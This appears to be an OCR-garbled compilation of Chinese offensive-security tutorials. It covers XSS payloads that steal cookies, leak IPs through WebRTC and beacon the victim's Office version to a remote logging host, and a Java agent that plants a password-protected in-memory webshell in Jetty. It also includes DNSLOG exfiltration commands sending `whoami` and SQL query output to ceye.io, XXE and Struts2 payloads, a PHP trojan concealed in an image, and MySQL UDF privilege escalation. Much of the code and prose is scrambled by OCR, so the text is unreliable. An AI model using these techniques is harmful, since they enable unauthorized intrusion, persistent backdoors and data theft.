利用 
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既然 找到 了 xss 点 ， 我 们 怎么 利用 ， 来 插入 js 代码 |^ = 


插入 js 代码 


Js 可 以 干 很 多 的 事 ， 可 以 获取 cookies( 对 http-only 没 用 )、 控 制 用 户 的 动作 (发 帖 、 私 信 什 么 的 等 
等 。\ 还 可 以 这 样 “比如 我 们 在 网 站 的 留言 区 输入 \ 当 管理 员 进 后 人 台 浏 览 留言 的 时 候 ， 就 会 触发 
然后 管理 员 的 cookies 和 后 台地 址 还 有 管理 员 浏览 器 版 本 等 等 你 都 可 以 获取 到 了 ， 再 用 修改 你 的 ， 
cookies， 就 可 以 不 用 输入 账号 密码 验证 码 就 可 以 以 管理 员 的 方式 来 进行 登录 了 。 


当然 了 ， 还 可 以 这 样 干 


获取 ip 地 址 
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x 



















the IP addresses associated with an account » $- 
‘tion getIPs(callback){ 

rip dups = {}; 

compatibility for firefox and chrome 

r RTCPeerConnection = window.RTCPeerConnection 
window.mozRTCPeerConnection 

- window.webkitRTCPeerConnection; 

ar mediaConstraints - ( 

ptional: [(RtpDataChannels: true)] 


/firefox already has a default stun server in about:config 
// media.peerconnection.default iceservers = 

[{"url": "stun:stun.services.mozilla.com"}] 

var servers = undefined; 

//add same stun server for chrome 

if (window. webkitRTCPeerConnection) 

rvers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]}; 
//construct a new RTCPeerConnection 

var pc - new RTCPeerConnection(servers, mediaConstraints); 
//listen for candidate events 

.pc.onicecandidate = function(ice){ 

//skip non-candidate events 

‘if(ice. candidate) { 

| //match just the IP address 

“var ip regex = /([0-9](1, 3) (^. [0-9] (1, 3)) (3))/ 

| var ip addr - ip regex.exec(ice.candidate.candidate)[1]; 
_//remove duplicates 

_if(ip_dups[ip_addr] === undefined) 

~ Callback(ip_addr); 

_ ip dups[ip addr] = true; 

E} 

E}; 

— //create a bogus data channel 

~ pc.createDataChannel(""); 

~ //create an offer sdp 

pc.create0ffer(function(result){ 

//trigger the stun server request 
pc.setLocalDescription(result, function(){}, function(){}); 
}, function(){}); 

} 

//insert IP addresses into the page 

getIPs(function(ip){ 

var li = document.createElement("li"); 

li.textContent - ip; 

//local IPs 

if (ip.match(/4(192\.168\. |169\.254\. |10\. |172\.(41[6-9]|2\d|3[01]))/)) 
// do something with PRIVATE IPs 

//assume the rest are public IPs 
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else 
// do something with PUBLIC IPs 
}); 


获取 浏览 器 信息 


document .write('<P>'+navigator.appName+'</P>'); 
document .write('<P>'+navigator .appVersion+'</P>'); 
document .write('<P>'+navigator.platform+'</P>'); 
document .write( '<P>'+navigator.userAgent+'</P>'); 


var plugins = navigator.plugins; 
var mimeTypes = navigator.mimeTypes 


document .write('<P>'); 
for (i=0;i<plugins.length;it++) { 

var plugin = plugins[i]; 

document .write('<B>'+plugin.name+'</B><BR>'); 
document.write(plugin.filename*' - '+plugin.description+'<BR>'); 
for(jz08;j«plugin.length;j**) { 

var mimetype - plugin[j]; 

document .write(mimetype.type) ; 

if(mimetype.description) { 


document.write(' : '+mimetype.description); 
} 
if(mimetype.suffixes) { 
document.write(' - extentions: '«mimetype.suffixes); 
} 
document .write('<BR>'); 
} 
} 


document .write('</P>'); 


CSRF 
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tion request(url, type, callback, send){ 


r oReq = new XMLHttpRequest(); 
leg.open(type, url, true); 


Req.onload = callback; 
Req. send(send); 
nction getListener () { 


el.innerHTML - this.responseText; 


function postListener(){ 
"console.log(this.responseText) 


te 
Ji 


取 office 信 息 


eq. setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); 


var el = document.createElement('div'); 


request('csrf.php', 'POST', postListener, 


request('csrf.php', 'GET', getListener); 
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'csrf token-' + el.querySelector('inr 


H 
ny qus qus qu 


var ma 
var mb 
var mc 
var md 


ERY of 
ma = new ActivexObject ("SharePoint .OpenDocuments.4") 


} catch (e) {} 


try 
mb = new ActiveXObject("SharePoint.OpenDocuments.3") 


} catch (e) {} 


try { 
mc - new ActiveXObject("SharePoint.OpenDocuments.2") 


) catch (e) {} 


try a 
md = new ActiveXObject("SharePoint.OpenDocuments.1") 


} catch (e) {} 


var a = typeof ma; 
| var b - typeof mb; 
| var c = typeof mc; 
var d - typeof md; 


var key - "No Office Found"; 





| if (a == "object" && b == "object" && c == "object" && d == "object") { 
| key - "Office 2010" 
} 
| if (a == "number" && b == "object" && c == "object" && d == "object") { 
| key = "office 2007" 
| i 
if (a == "number" && b == "number" && c == "object" && d == "object") { 
key - "Office 2003" 
} 
if (a == "number" && b == "number" && c == "number" && d == "object") { 
key - "Office Xp" 
} 
| new Image().src = 'http://remote.com/log.php?0ffice_version='+encodeURI (key); 


参考 资料 










weet (XSS BYPASS 
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反射 与 内 存 shell 初探 -基于 jetty 容 器 的 shell 维权 


I5 (BERE KEAN, hook jetty 容器 ， 设 计 内 存 shell 


: 了 rebeyond 师傅 的 《利用 “进程 注入 "实现 无 文件 复活 WebShell》 一 文 ， 发 现 通过 反射 、 代 
术 实 现 内 存 webshell 的 实战 意义 ， 感 觉 这 种 后 门 一 般 人 很 难 发 现 ， 隐 藏 比较 深 ， 故 记录 此 文 针 
器 进行 hook 进行 设计 内 存 shell。 


Va Instrumentation 指 的 是 可 以 用 独立 于 应 用 程序 之 外 的 代理 (agent) 程序 来 监测 和 协助 运行 在 

JM 上 的 应 用 程序 。 这 种 监测 和 协助 包括 但 不 限于 获取 JVM 运 行 时 状态 ， 替 换 和 修改 类 定义 等 。 简 
一 句 话 概括 下 : Java Instrumentation 可 以 在 JVM 启 动 后， 动态 修改 已 加 载 或 者 未 加 载 的 类 ， 和 包括 
的 属性 、 方 法 。 


xample 案 例 的 复 现 


iebeyond 师 傅 通 过 Example 项 目 介绍 思路 原理 时 ， 是 利用 编译 好 的 Bird.class 字 节 码 替换 jvm 中 的 
itd 对 象 进行 的 实现 。 在 后 面 实现 对 tomcat 进 程 中 ， 相 关 类 方法 的 功能 修改 时 ， 使 用 的 是 Javaassist 
从 源码 级 别 添加 的 ， 此 处 进行 Example 的 实验 ， 也 采用 该 手段 进行 修改 。 


4 public class Bird { public void say(){ 
- System.out.println("Bird is gone."); 
p 

1 } 


Public class Main { 
Public static void main(String[] args)throws Exception{ while (true){ 
Bird bird=new Bird(); bird.say(); Thread.sleep(3000); 


agenti El AgentEntry.java 


E : » > w @ 


import java.lang.instrument.Instrumentation; 
import java.lang.instrument.UnmodifiableClassException; 


public class AgentEntry ( 

public static void agentmain(String agentArgs, Instrumentation inst) 
throws ClassNotFoundException, UnmodifiableClassException, InterruptedExceptio; 
Class[] loadedClasses = inst.getAllLoadedClasses(); for(Class c: loadedClasse; 
if (c.getName().equals("Bird"))[try { 
System.out.println("inagentmain"); inst.retransformClasses(c); 
}catch (Exception e){ e.printStackTrace(); 

} 

J 

} 

System.out.println("Class changed!"); 

} 

J 






使 用 Instrumentation 加 载 该 进程 vm 所 有 加 载 的 class 通 过 classname 进 行 选择 需要 操作 的 class。 


Transformer.java 


OIA 





mport javassist.ClassClassPath; import javassist.ClassPo9l; import javassist.CtC 
import javassist.CtMethod; 


import java.io.BufferedReader; import java.io.InputStream; import java.io.Inputs 
import java.lang.instrument.ClassFileTransformer; 
import java.lang.instrument.IllegalClassFormatException; import java.security.Pr 


public class Transformer implements ClassFileTransformer ( @Override 

public byte[] transform(ClassLoader classLoader, String S, 

Class<?> aClass, ProtectionDomain protectionDomain, byte[] bytes) throws Illegal 
if ("Bird".equals(s))( try{ 

ClassPool cp = ClassPool.getDefault(); 

ClassClassPath classPath - new ClassClassPath(aClass); cp.insertClassPath(cle 
CtClass cc - cp.get("Bird"); 

CtMethod m - cc.getDeclaredMethod("say"); String text; 

text = readSource(); System.out.println(text); m.insertBefore(text); 

byte[] byteCode = cc.toBytecode(); cc.detach(); 


return byteCode; 

catch (Exception ex){ ex.printStackTrace(); 
System.out.println("error:::::"*ex.getMessage()); 
} 

} 

return null; 

} 


public String readSource(){ 

StringBuilder source-new StringBuilder(); InputStream is - 
Transformer.class.getClassLoader().getResourceAsStream("source.txt"); InputStree 
String line-null; try ( 


BufferedReader br = new BufferedReader(isr); while((line=br.readLine()) != null) 
source.append(line); 
T 
) catch (Exception e) ( e.printStackTrace(); 
j 
return source.toString(); 
j 
} 


使 用 javassist 修 改 相关 的 对 象 方法 。 
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idea Artifacts 配 置 如 下 


Output Layout Pre 


mH +, 


Cancel 





agentStarti El 


attach.java 
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import com.sun.tools.attach.VirtualMachine; 
import com.sun.tools.attach.VirtualMachineDescriptor; 
import java.util.List; 
public class attach { 
public static void main(String[] args)throws Exception{ 
VirtualMachine vm-null; List«VirtualMachineDescriptor» vmList - null; //while (t 
try t 
vmList - VirtualMachine.list(); 
for (VirtualMachineDescriptor vmd:vmList){ System.out.println(vmd.displayName()) 
if(vmd.displayName().contains("Example")||vmd.displayName().equals(""))( vm = Vi 
System.out.println("Ok,i find a jvm."); Thread.sleep(1000); 
if (null !=vm){ 
vm. loadAgent ("/root/Desktop/memshellPro/newagent.jar"); System.out.println("inje 
vm.detach(); 
return; 
yd 
j 


}catch (Exception e){ e.printStackTrace(); 


> 


LAS it 





针对 Jetty 的 内 存 webshell 


根据 rebeyond 师 传 文中 的 提 到 的 大 多 数 java web 容 器 使 用 doFilter 方法 进行 request、response 处 
理 的 特征 ， 所 以 在 以 jetty 为 分 析 目 标的 前 提 下 ， 对 jetty 中 jetty-serviet 以 doFilter 为 关键 字 进 行 相关 
method 的 搜索 ， 得 到 和 tomcat 源 码 中 internalDoFilter 最 为 类 似 的 method 如 下 
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t 
下 
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package org.eclipse.jetty.servlet; uo - p oo 


public class ServletHandler extends ScopedHandler 


{ 


private class Chain implements FilterChain 

{ 

final Request _baseRequest; final List<FilterHolder> _chain; 
final ServletHolder _servletHolder; int _filter= 0; 


yis Sy 

private Chain(Request baseRequest, List«FilterHolder» filters, ServletHolder ser 
{ 

.baseRequest-baseRequest; 

.chain- filters; 

_servietHolder= servletHolder; 


} 


p */ QOverride 
public void doFilter(ServletRequest request, ServletResponse response) throws IC 
(if (LOG.isDebugEnabled()) LOG.debug("doFilter " + filter); 


// pass to next filter 

if ( filter « _chain.size()) 

í 

FilterHolder holder= _chain.get(_filter++); if (LOG.isDebugEnabled()) 
LOG.debug("call filter " + holder); Filter filter- holder.getFilter(); 


package org.eclipse.jetty.servlet; 


public class ServletHandler extends ScopedHandler 


( 


protected CachedChain(List«FilterHolder» filters, ServletHolder servletHolder) 
1 

if (filters.size()>0) 

t 


filterHolder-filters.get(0); filters.remove(0); 
next=new CachedChain(filters,servletHolder); 


} 
else 
 servletHolder-servletHolder; 


} 


yas */ @Override 
public void doFilter(ServletRequest request, ServletResponse response) throws IC 


i. 
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final Request baseRequest-Request .getBaseRequest (request); v "uu 


// pass to next filter if ( filterHolder!-null) 


构建 agent 进行 hook 


于 是 编写 相关 的 agent AgentEntry.java 





ublic class AgentEntry { 
public static void agentmain(String agentArgs, Instrumentation inst) throws Clas 
UnmodifiableClassException, InterruptedException{ inst.addTransformer(new Transfc 
System.out.print("className "); System.out.println(c.getName()); 

// if(c.getName().equals("org.eclipse.jetty.servlet.ServletHandler$Chain") ){ 


if(c.getName().equals("org.eclipse.jetty.servlet .ServletHandler$CachedChain")){ 
System.out.println("inAgent"); inst.retransformClasses(c); 

jcatch (Exception e){ e.printStackTrace(); 

j 


w ov we we 


Transformer.java 
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public class Transformer implements ClassFileTransformer { @Override 

public byte[] transform(ClassLoader classLoader, String s, 

Class?» aClass, ProtectionDomain protectionDomain, byte[] bytes) throws Illegal 
System.out.println(s); 

if ("org/eclipse/jetty/servlet/ServletHandler$CachedChain".equals(s)){ try( 
System.out.print("in Transformer "); System.out.println(s); 

ClassPool cp - ClassPool.getDefault(); 

ClassClassPath classPath - new ClassClassPath(aClass); cp.insertClassPath(cle 
CtClass cc - cp.get("org.eclipse.jetty.servlet.ServletHandler$CachedChain"); 
CtMethod[] methods; 

methods = cc.getDeclaredMethods(); for (CtMethod ele:methods)( 
System.out.print("method "); System.out.println(ele.getName()); 


} 
CtMethod m = cc.getDeclaredMethod("doFilter"); 


cc.getDeclaredMethods(); String text; 

text = readSource(); System.out.println(text); m.insertBefore(text); 
byte[] byteCode = cc.toBytecode(); cc.detach(); 

return byteCode; 

scatch (Exception ex){ ex.printStackTrace(); 
System.out.println("error:::::"*ex.getMessage( )); 

9 

} 


return null; 


attach.java 


public class attach { 

public static void main(String[] args)throws Exception{ VirtualMachine vm-null; 
//while (true)( try ( 

vmList - VirtualMachine.list(); 


for (VirtualMachineDescriptor vmd:vmList){ System.out.println(vmd.displayName()) 
vm = VirtualMachine.attach(vmd); System.out.println("Ok,i find a jvm."); Thread. 
if (null !=vm){ vm.loadAgent("/root/Desktop/memshellPro/agent.jar"); System.out. 
vm.detach(); return; 

} 


} 
}e.printStackTrace(); 
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source.txt 





avax.servlet.http.HttpServletRequest request=$1; javax.servlet.http.HttpServy]er, 
String pass the world-request.getParameter("pass the world"); String model-reque 
String result-"testOK"; System.out.println("inject run"); 
if (pass the world!-null&&pass the world.equals("wokaka"))[( System. out. println(" 
return; 


} 


System.out.println("password incorrect."); return; 


译 后 使 用 attach 加 载 执行 ， 发 现 毫 无 效果 。 在 进行 Example 项 目测 试 时 ， 通 过 
System.out.println(vmd.displayName) , System.out.printin(c.getName) 等 方式 对 编码 中 需要 明确 的 
一 些 关 键 函 数 和 方法 进行 打印 输出 ， 便 于 我 们 理解 该 思路 的 原理 以 及 帮助 我 们 排除 错误 和 顺利 编 
码 。 


运行 我 们 的 代码 发 现在 注入 jetty 进 程 后 处 理 org/eclipse/jetty/servlet/ServletHandler$CachedChain 
对 象 报错 


in Transformer org/eclipse/jetty/servlet/ServletHandler$CachedChain java.lang.Nt 
at javassist.ClassClassPath.find(ClassClassPath.java:91) at javassist.ClassPooll 
at javassist.ClassPool.createCtClass(ClassPool.java:568) at javassist.ClassPool. 
at javassist.ClassPool.get(ClassPool.java:442) at Transformer.transform(Transfor 
at sun.instrument.TransformerManager.transform(TransformerManager.java:188) at s 


at java.lang.ClassLoader.defineClass(ClassLoader.java:763) 

at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142) at je 
at java.net.URLClassLoader.access$100(URLClassLoader.java:73) at java.net.URLClé 
at java.net.URLClassLoader$1.run(URLClassLoader.java:362) 

at java.security.AccessController.doPrivileged(Native Method) at java.net.URLCle 
at java.lang.ClassLoader.loadClass(ClassLoader.java:357) at 
org.eclipse.jetty.servlet.ServletHandler.newCachedChain(ServletHandler.java:823) 


> 


尝试 修改 其 他 method 实 现 所 需 功能 。 经 过 分 析 代码 总 结 特征 之 后 ， 打 算 以 参数 含有 request、 
response& 2X, 发 现 如 下 方法 


public void doHandle(String target, Request baseRequest,HttpServletRequest reque 


> 
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package org.eclipse.jetty.servlet; 


@ManagedObject("Servlet Handler") 

public class ServletHandler extends ScopedHandler { 

private static final Logger LOG = Log.getLogger(ServletHandler.class) ; 

public void doScope(String target, Request baseRequest, HttpServletRequest reque 


{ 
// Get the base requests 


final String old_servlet_path=baseRequest.getServletPath(); final String old_pat 
DispatcherType type = baseRequest.getDispatcherType(); 


public void doScope(String target, Request baseRequest, HttpServletRequest reque 


调整 注入 对 象 和 方法 后 ， 以 及 调整 source.txt 中 参数 值 后 ， 成 功 注入 


rvlet http Httpser 
st getParamete 





日 志 中 出 现 ， 说 明 注入 修改 成 功 ， 但 是 response body 中 依然 对 于 response 没 有 修改 成 功 ， 这 样 我 
们 可 以 实现 无 回 显 的 后 门 

















‘org/ecl\ jetty/server/Authenticat $5 
org/eclipse/jetty/server/Authenticat $SendSuccess 

lorg eclipse/jetty/server/Authentication$Wrapped 

for J/eclipse/jetty/serv« tication$User 
org/eclipst tication$Deferred 

» 

inject i 

password inco 
rga/eclipse/1etty/http/QuotedQualityC5V 

i ; 

Qorg/eclipse/jetty/http QuotedC5V 

i 

rg/eciipse/jetty/nttp state 
rg/eclipse/jetty/http ] 

V ang/AbstractMethodError 
rg/ectipse/jetty/ut ByteArrayOutputSt 
ro/e if etty erver/Rest ‘ 
ra í [ ¢ etty o! Gr Htt itt > 
rg/e 1pse/jetty/server/HttpChannels! t DaCK 
rg/e ipse/jJetty/uti Cal .backsNeste 
rg/« pse/jetty/ut IteratingCallback$l 

^n T $ ~ 大 
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接着 查找 方法 体 中 涉及 对 response 进 行 操作 的 方法 
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package org.eclipse.jetty.servlet; pa^ 


@ManagedObject("Servlet Holder") 
public class ServletHolder extends Holder<Servlet> implements UserIdentity.Scope 


( 


y" */ private static final Logger LOG - Log.getLogger(ServletHolder.class) 
private boolean _initOnStartup=false; private Map<String, String> _roleMap; priv 


/* 

*Service a request with this servlet. 

* 

*@param baseRequest the base request 

*@param request the request 

*Qparam response the response 

*Qthrows ServletException if unable to process the servlet 
*@throws UnavailableException if servlet is unavailable 

*@throws IOException if unable to process the request or response 
=f 

public void handle(Request baseRequest, 

ServletRequest request, ServletResponse response) 

throws ServletException, UnavailableException, IOException 

{ 

if ( class--null) 

throw new UnavailableException("Servlet Not Initialized"); Servlet servlet - ens 


对 其 进行 相关 操作 ， 成 功 实现 回 显 


root@localhost memshellPro]é curl http://localhost:8080/guacamole/?pass the worldswokaka 
es tOK unt RUE vU 2 i 


希望 关注 基于 hook 容器 的 webshell 维权 的 师傅 可 以 多 多 交流 。 
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利用 DNSLOG 回 显 


在 实战 中 ， 可 能 会 遇 到 SQL 注 入 、 命 令 执行 等 漏洞 并 无 回 显 ， 我 们 无 法 判断 是 否 执行 成 功 或 能 于 
网 。 这 个 时 候 ， 我 们 可 以 利用 DNSLOG 来 进行 回 旺 。DNSLOG 是 一 种 回 显 机 制 ，DNS 在 解析 的 时 
候 会 留 下 解析 日 志 ， 使 用 者 可 以 通过 DNS 解 析 日 志 来 读 取 漏 洞 的 回 显 。 






DNSLOG 的 原理 我 们 把 信息 放 在 高 级 域名 中 ， 获取 信息 将 dnslog 平 台中 的 特有 字段 payload 带 入 目 
标 发 起 dns 请 求 ， 通 过 dns 解析 将 请 求 后 的 关键 信息 组 合成 新 的 三 级 域名 带 出 ， 在 ns 服务 器 的 dns 百 
志 中 显示 出 来 。 


DNSLOG 工 具 如 果 有 自己 的 服务 器 和 域名 ， 可 以 自 建 一 个 这 样 的 平台 : 
也 可 以 使 用 在 线 平台 : 注册 后 即 可 获得 一 
Q Identifier: 


个 域名 可 
以 在 和 和 用 pa 


利用 一 : SQL 讶 注 通过 我 们 遇 到 布尔 型 盲 注 或 者 时 间 型 盲 注 ， 都 需要 通过 爆破 的 方法 去 获取 数据 ; 
在 WAF 的 防护 下 ， 很 可 能 无 法 获取 。 我 们 可 以 结合 DNSLOG 快 速 的 将 数据 取出 。 


MySql 的 盲 注 ， 可 以 利用 内 置 水 数 load_ 人 file() 来 完成 DNSLOG。 load_file0 不 仅 能 够 读 取 本 地 文件 ， 
同时 也 能 对 诸如 \www.test.com 这 样 的 URL 发 起 请 求 


Payload: select load_file(concat('\\\\', user(), '.weu@3v.ceye.io')); 


wom Vulnerability: SQL Injection (Blind) 





instructions 
Setup / Reset DB Submit 


MISSING rom the database 
Brute Force 


Command injection 











Name Remote Addr Created At (UTC «0) 


利用 二 、 命 令 执 行 


Te Linux: 
curl http://weu03v.ceye.io/`whoami` 
ping `whoami`.weuo3v.ceye.io 

ii. windows~~~~ 
ping %USERNAME%.weuO3v.ceye.io 


Ping a device 


Enter an IP address Iping USERNAME% weu03v ceyeio Submit 


Name Remote Addr Created At (UTC4O 


如 此 便 可 判断 目标 机 器 是 否 出 网 ， 当 然 直 接 上 线 CS 啦 。 


总 结 了 一 些 Widows 下 常用 的 变量 


%ALLUSERSPROFILE% 返回 “所 有 用 户 ” 配 置 文 件 的 位 置 。 

%CD% 返回 当前 目录 字符 串 。~~~~ 

%COMPUTERNAME% 返回 计算 机 的 名 称 。 

%0S% 返回 操作 系统 名 称 。Windows 2000 显示 其 操作 系统 为 Windows_NT。 
%USERDOMAIN% 返回 包含 用 户 帐户 的 域 的 名 称 。 

%USERNAME% 返回 当前 登录 的 用 户 的 名 称 。 

WWINDIR% 返回 操作 系统 目录 的 位 置 。 


ceye.io 上 也 提供 了 更 多 其 他 情况 的 利用 方式 
0x02 XML Entity Injection 


<?xml version="1,0" encodings “UTF-B"?> 


Jip port.b182ej.ceye. io/xxe test"» 





0x03 Others 


i. Struts2 


xx.action?redirect:http://ip.pi 





.b182o].ceye. 10/425(3*4] 


xx.action?redirect:$1X23aX3d(neuSz0java.lang.ProcessBuilder(newk283java.lang.Strísg[] 'whoami'))) 


start(),223b33dX23a. get InputStream() ,S23cS3dnewk20java. io. InputStrc 


ii. FFMpeg 





iii. Weblogic 


xxoo. con/uddiexplorer/SearchPublicRegistries.jsp?operatore-http://ip.pert.b1820j.ceye. ic/test&ndoSearchename&txtSearchnanessdf&txtSeanchkevs&txtSeanchfonsüselforeBi 
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文件 合成 /图 片 马 生成 
旨 的 是 代码 写 入 后 不 破坏 图 片 为 前 提 , 图 片 仍 可 正常 打开 。 
方法 一 : 


使 用 CMD 制 作 一 句 话 木马 参数 /b 指 定 以 二 进 制 格式 复制 、 合 并 文件 ; 用 于 图 像 类 /声音 类 文件 参数 /a 
虽 定 以 ASCII 格 式 复制 、 合 并 文件 。 用 于 txt 等 文档 类 文件 


image.jpga/b*code.php test.png 


/意思 是 将 image.jpg 以 二 进 制 与 code.php 合 并 成 test.pg 生成 之 后 打开 test.png 只 要 图 片 依 旧 正 常 显 
示 ， 用 记事 本 打开 可 以 看 到 乱码 末尾 有 一 个 一 句 话 


Sons 





方法 二 : 
—f]iá: 


<?php @ ($_POST[ i] )?> 
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用 010 Editor (HEX 编 辑 器 ) 打开 任意 一 一 张 图 片 ， 过 最 底层 或 最 上 层 后 保存 。 


启动 | WIR. 20140729_ 115039. ipga 


MESE 





4:F620h: 00 98 12 E3 23 AF AS 03 95 C1 ED 48 AE 00 04 71  .^.ü£ W.-ÁiHS..q 
4:F630hn: 41 CB 72 28 02 45 55 23 B5 35 D7 OC O8 E9 DE 98 ir (.EU&u5x*..éb^ 
4:F640n: 84 86 EO Fl 4F 66 AO 04 63 B7 E6 53 9F 6A 45 60 „tàñOf .c-eSY3E- 
4:F650h: D8 39 E? BD 33 04 31 24 1D BS 22 8E D8 EB DE 80  9gH3.15.u"Zg&b€ 
4:F660n: 24 25 95 46 79 07 BD 21 5C OC SE 94 85 49 1C E4  S&*Fy.! V." I.ü 
4:F670h: 11 52 E4 08 Fl 9F AD 02 2B F5 38 06 A3 FB A7 Fi .RA.AY-.+68.£668 
4:F680n: A7 48 BC Fl FA 53 17 79 E4 AF D2 80 25 OC 3A F6 §HWhUS. yd C€%.:6 
4:F690n: A? 6F DB SF 43 51 FD 3F 2A 91 76 ED Ci A6 04 90  SoD.CQy?* víÁ:.. 
4:F6A0n: CC Ei BO 18 83 ED 51 DC A3 31 DD 8E 69 09 00 8C  iá?.fiQUtiY2i..G 
4:F6BOh: 70 41 C8 35 60 CA 4A E5 81 6F 5A 00 CC DA C7 AS  pAES'EJá.o2.1ÜQ^ 
4:F6COn: E7 D2 9F 18 DE 30 6A F3 18 SF AS 02 AO 96 05 03  gÓY.b03ó. ^. -.. 
4:1F6D0h: 74 4F CF A6 29 01 5D A2 62 70 OE D2 4F 5A 37 BC  tOi:).]ecbp.ÓO027«4 
4:F6E0h: 67 1C E7 DE 82 1B 3C D2 BC 9B 80 OC 73 SE F4 OE  g.Qb,.«Ow0€.s2ó6. 
4:F6FOh: E2 AC CC C7 07 F3 A7 AC A4 FO 4E 45 42 AC A3 EF  á-lQ.ó6S-x8NEB-£i 
4:F700n: OC FB 8A 47 72 A7 20 66 80 2C 17 28 D9 51 F5 06  .ü$GrS f€,.(0Q8. 
4:F710h: 9D BD 98 82 38 F5 14 C8 26 4E 8E B9 F7 CF 4A 71 ,.——885.É&tNZ:-iJq—., 
4:F720n: D8 AD 95 E3 3D 68 01 4A E4 83 DO BA 42 99 07 8A [oem MAT | 
4:F730h: 56 70 07 F5 A8 8C A7 D6 81 iF FF D9 3C 3F 62 | Vp 57090. 

$:F740h: i r; ez $ rg & ZW me fy L3 E ~ Z ON i ae t s in 
4:F750n: 
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UDF 提 权 


概念 :MySql 提供 了 一 个 让 使 用 者 自行 添加 新 的 函数 的 功能 ， 这 种 用 户 自 行 扩展 函数 的 功能 就 较 
UDF. 


当 我 们 拿 到 webshell 后 ， 由 于 中 间 件 例如 ，apache 人 允许 的 使 用 使 用 了 较 低 的 权限 ， 可 能 仅仅 是 个 网 
络 服 务 的 权限 ， 然 后 我 们 就 需要 进行 提 权 ， 而 有 时 候 目 标 机 器 补丁 较 全 ， 各 种 系统 提 权 姿势 都 失效 
的 情况 下 ， 可 以 将 对 象 转 义 到 数据 库 服 务 上 ， 在 Windows 下 ， 在 较 低 版 本 的 mysql (<5.6) 安装 时 
默认 是 系统 权限 。 还 有 就 是 很 多 人 图 方便 ， 例 如 使 用 了 各 种 集成 环境 ， 未 做 安全 设置 ， 直 接 用 root 
账户 进行 配置 站 点 ， 就 可 以 考虑 用 UDF 进 行 提 权 。 


不 同 版 本 的 区 别 : MySql < 4.1: 






允许 用 户 将 任何 的 DLL 文件 里 面 的 函数 注册 到 MySq1 里 。 


MySql 4.1-5.0: 
对 用 来 注册 的 DLL 文件 的 位 置 进行 了 限制 ， 通 常 我 们 选择 UDF 导 出 到 系统 目录 


C:/windows/system32/ 来 跳 过 限制 。 


MySql >=5.1: 


这 些 DLL 只 能 被 放 在 MySql 的 plugin 目 录 下 。 


操作 步骤 : 1. 上 传 具有 MySql 提 权 功 能 的 大 马 : 


192.168.10.130 - WINNT - Apache / 2.4.39 (Win64) Opentat/ 1.1.10 mod, fegid/2.3.9a mod, jog rotate / 1.02 





zara [MYSQL ] [MYSQUI A) [MYSQUE S 40] IMYSQU! I £1 [MYSQL IN A 


RRS locant 3306 


roct ers 


TE 
apara Ses IH 


2. 首 先 先 确认 MySdl 版 本 : 


这 里 的 前 提 是 ， 我 们 需要 先知 道 数据 库 的 账号 密码 ， 这 个 通常 webshell 翻 阅 站 点 下 的 配置 文件 即 可 
找到 。 进 行 连接 后 ， 执 行 : 


select version(); 
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© 192.168.10.130 - 
文件 管理 [MYSQL 执 行 
执行 命令 地 址 localhost ^L 3306 用 户 root 密码 root 
naa Pp select version(): 

RES 

MYSQL 执 行 

MYSQL 管 理 

PostgreSQL 

其 它 数据 库 

扫描 木马 

搜索 文件 显示 版 本 执行 


批量 替换 d rSQLi GIRI 
—À 5.5.53 





WINNT - Apache/ 2.4.23 (Win32) OpenSSL/ 1.0.2) PHP/5.4.45 


] [MYSQL 提 权 ] [MYSQL 4 (9] [MYSQL LI x: f] [MYSQL Fat x ft] 
库 名 mysql 














和 守 合 MySql>=5.1 的 情况 。 
3. 查 看 plugin 目 录 名 称 : 


show variables like ‘plugin%’; 


© © 192.168.10.130 - WINNT - Apache/ 2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45 





文件 管理 [MYSQL 执 行 语句 ] [MYSQL 提 权 ] [MYSQL 6) [MYSQL I-f6 Ltt] [MYSQL AR cf] 


执行 命令 地 址 localhost iil) 3306 fly root it) root M4 % mysql 
show variables like 'plugin* | 


扫描 端口 Sa 
系统 信息 
MYSQL 执 行 
MYSQL 管 理 
PostgreSQL 
其 它 数据 库 
扫描 木马 
搜索 文件 显示 版 本 执行 
me 热 行 SQL 语句 城 功 


plugin dir <== 





Cama a 


4. 查 询 目录 的 绝对 路 径 : 


select @ @plugin_dir; 


© © © 192.168.10.130 - WINNT - Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45 





文件 管理 [MYSQL 执 行 请 各] [MYSQL 提 权 ] [MYSQL 脱 库 备 份 ] [MYSQL 上 上 传 文 件 ] [MYSQL 下 载 文件 ] 


执行 命令 ithik focathost 端口 3306 骨 户 root I) root Yt V mysql 


扫描 端口 
系统 信息 
MYSQL 执 行 


select @@plugin dir 


MYSQL 管 理 

PostgreSQL 

其 它 数据 库 

扫描 木马 

搜索 文件 显示 版 本 执行 

BE ove My SQLVIDUAugi 
5. 修 改 大 马 的 内 容 ， 这 个 路 径 一 般 在 大 马 的 代码 中 ， 因为 会 进行 提 权 的 时 候 需要 根据 版 本 指定 dll 写 
入 的 路 径 ， 对 代码 中 的 路 径 进 行 修改 即 可 。 或 者 如 果 是 页 面 上 就 可 以 指定 的 也 就 不 需要 改 大 马 的 代 


BST. 
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if(file exists c^ 
eiseif(file exists c 


6. ZXDLL: 








\\plugin\y’)) $dir="c\\phpStud) 
IDA \\Aphpst 





文件 管理 [MYSQLIL (rci ty] (MYSQUIS IC (MYSQUIELA: & (0) [MYSQL 1-0; crt] (MYSQL PAR Cth] 
执行 命令 地 志 localhost 端口 3306 用 户 root 40) root 库 和 名 mysql 


select state(“net user”)| 


扫描 端口 


MYSQL 执 行 
MYSQL 管 理 
PostgreSQL 


nenes t 

扫描 木马 安装 DLL 后 门 执行 CMD 语 句 
前 提 : 
这 里 要 执行 成 功 的 前 提 是 允许 mysqld 在 指定 目录 或 任意 目录 的 导入 导出 权限 。 
RA: 





secure_file_priv 参 数 用 于 限制 LOAD DATA, SELECT ...OUTFILE, LOAD_FILE() 传 到 哪个 指定 目 
录 。 


secure_file_priv 为 NULL 时 ， 表 示 限 制 mysqld 不 允许 导入 或 导出 。 
secure file priv 为 /tmp 时 ， 表 示 限 制 mysqld 只 能 在 /mp 目录 中 执行 导入 导出 ， 其 他 目录 不 能 


fie 
secure file priv 没有 值 时 ， 表 示 不 限制 mysqld 在 任意 目录 的 导入 导出 。 
查看 secure_file_priv 的 值 ， 默 认为 NULL， 表 示 限 制 不 能 导入 导出 。 





+ 选项 


Variable_name Value 


secure file priv NULL < 


当 人 允许 进 行 操作 时 : 
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+ 选项 

